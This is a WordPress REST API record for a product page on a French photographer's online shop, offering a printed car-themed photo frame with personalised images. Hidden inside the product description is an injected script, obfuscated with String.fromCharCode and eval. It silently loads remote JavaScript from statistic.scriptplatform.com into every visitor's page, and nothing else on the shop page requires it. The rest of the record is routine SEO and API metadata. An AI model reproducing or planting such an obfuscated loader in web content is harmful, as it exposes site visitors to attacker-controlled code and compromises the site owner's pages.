{"id":2094,"date":"2022-04-22T11:44:56","date_gmt":"2022-04-22T09:44:56","guid":{"rendered":"https:\/\/geraldineoberland.com\/?post_type=product&#038;p=2094"},"modified":"2022-05-03T18:17:44","modified_gmt":"2022-05-03T16:17:44","slug":"cadre-dune-voiture","status":"publish","type":"product","link":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/","title":{"rendered":"Cadre d&#8217;une voiture"},"content":{"rendered":"<p>Les images personnalis\u00e9es que vous pouvez\u00a0 commander sont \u00e0 choisir parmi les photos dans le rubrique &#8220;Voyage photo&#8221;.<\/p>\n<p>Je vous recontacterais si vous avez d\u00e9cid\u00e9s de prendre une image personnalis\u00e9e.<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les images personnalis\u00e9es que vous pouvez\u00a0 commander sont \u00e0 choisir parmi les photos dans le rubrique &#8220;Voyage photo&#8221;.<\/p>\n<p>Je vous recontacterais si vous avez d\u00e9cid\u00e9s de prendre une image personnalis\u00e9e.<\/p>\n","protected":false},"featured_media":2096,"comment_status":"open","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":""},"product_cat":[18],"product_tag":[],"class_list":{"0":"post-2094","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-non-classe","8":"first","9":"instock","10":"taxable","11":"shipping-taxable","12":"purchasable","13":"product-type-variable"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Cadre d&#039;une voiture - Geraldine Oberland<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cadre d&#039;une voiture - Geraldine Oberland\" \/>\n<meta property=\"og:description\" content=\"Les images personnalis\u00e9es que vous pouvez\u00a0 commander sont \u00e0 choisir parmi les photos dans le rubrique &quot;Voyage photo&quot;.  Je vous recontacterais si vous avez d\u00e9cid\u00e9s de prendre une image personnalis\u00e9e.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/\" \/>\n<meta property=\"og:site_name\" content=\"Geraldine Oberland\" \/>\n<meta property=\"article:modified_time\" content=\"2022-05-03T16:17:44+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4-1024x717.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"717\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/\",\"url\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/\",\"name\":\"Cadre d'une voiture - Geraldine Oberland\",\"isPartOf\":{\"@id\":\"https:\/\/geraldineoberland.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png\",\"datePublished\":\"2022-04-22T09:44:56+00:00\",\"dateModified\":\"2022-05-03T16:17:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage\",\"url\":\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png\",\"contentUrl\":\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png\",\"width\":5000,\"height\":3500},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/geraldineoberland.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/geraldineoberland.com\/index.php\/boutique-2\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Cadre d&#8217;une voiture\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/geraldineoberland.com\/#website\",\"url\":\"https:\/\/geraldineoberland.com\/\",\"name\":\"Geraldine Oberland\",\"description\":\"photographe de destination, d&#039;\u00e9v\u00e8nement et drone\",\"publisher\":{\"@id\":\"https:\/\/geraldineoberland.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/geraldineoberland.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/geraldineoberland.com\/#organization\",\"name\":\"Geraldine Oberland\",\"url\":\"https:\/\/geraldineoberland.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/geraldineoberland.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/Geraldine-Oberland-3.png\",\"contentUrl\":\"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/Geraldine-Oberland-3.png\",\"width\":1767,\"height\":161,\"caption\":\"Geraldine Oberland\"},\"image\":{\"@id\":\"https:\/\/geraldineoberland.com\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cadre d'une voiture - Geraldine Oberland","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/","og_locale":"fr_FR","og_type":"article","og_title":"Cadre d'une voiture - Geraldine Oberland","og_description":"Les images personnalis\u00e9es que vous pouvez\u00a0 commander sont \u00e0 choisir parmi les photos dans le rubrique \"Voyage photo\".  Je vous recontacterais si vous avez d\u00e9cid\u00e9s de prendre une image personnalis\u00e9e.","og_url":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/","og_site_name":"Geraldine Oberland","article_modified_time":"2022-05-03T16:17:44+00:00","og_image":[{"width":1024,"height":717,"url":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4-1024x717.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/","url":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/","name":"Cadre d'une voiture - Geraldine Oberland","isPartOf":{"@id":"https:\/\/geraldineoberland.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage"},"image":{"@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage"},"thumbnailUrl":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png","datePublished":"2022-04-22T09:44:56+00:00","dateModified":"2022-05-03T16:17:44+00:00","breadcrumb":{"@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#primaryimage","url":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png","contentUrl":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/mockup-corfou-4.png","width":5000,"height":3500},{"@type":"BreadcrumbList","@id":"https:\/\/geraldineoberland.com\/index.php\/produit\/cadre-dune-voiture\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/geraldineoberland.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/geraldineoberland.com\/index.php\/boutique-2\/"},{"@type":"ListItem","position":3,"name":"Cadre d&#8217;une voiture"}]},{"@type":"WebSite","@id":"https:\/\/geraldineoberland.com\/#website","url":"https:\/\/geraldineoberland.com\/","name":"Geraldine Oberland","description":"photographe de destination, d&#039;\u00e9v\u00e8nement et drone","publisher":{"@id":"https:\/\/geraldineoberland.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/geraldineoberland.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/geraldineoberland.com\/#organization","name":"Geraldine Oberland","url":"https:\/\/geraldineoberland.com\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/geraldineoberland.com\/#\/schema\/logo\/image\/","url":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/Geraldine-Oberland-3.png","contentUrl":"https:\/\/geraldineoberland.com\/wp-content\/uploads\/2022\/04\/Geraldine-Oberland-3.png","width":1767,"height":161,"caption":"Geraldine Oberland"},"image":{"@id":"https:\/\/geraldineoberland.com\/#\/schema\/logo\/image\/"}}]}},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product\/2094","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/comments?post=2094"}],"version-history":[{"count":3,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product\/2094\/revisions"}],"predecessor-version":[{"id":3075,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product\/2094\/revisions\/3075"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/media\/2096"}],"wp:attachment":[{"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/media?parent=2094"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=2094"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/geraldineoberland.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=2094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}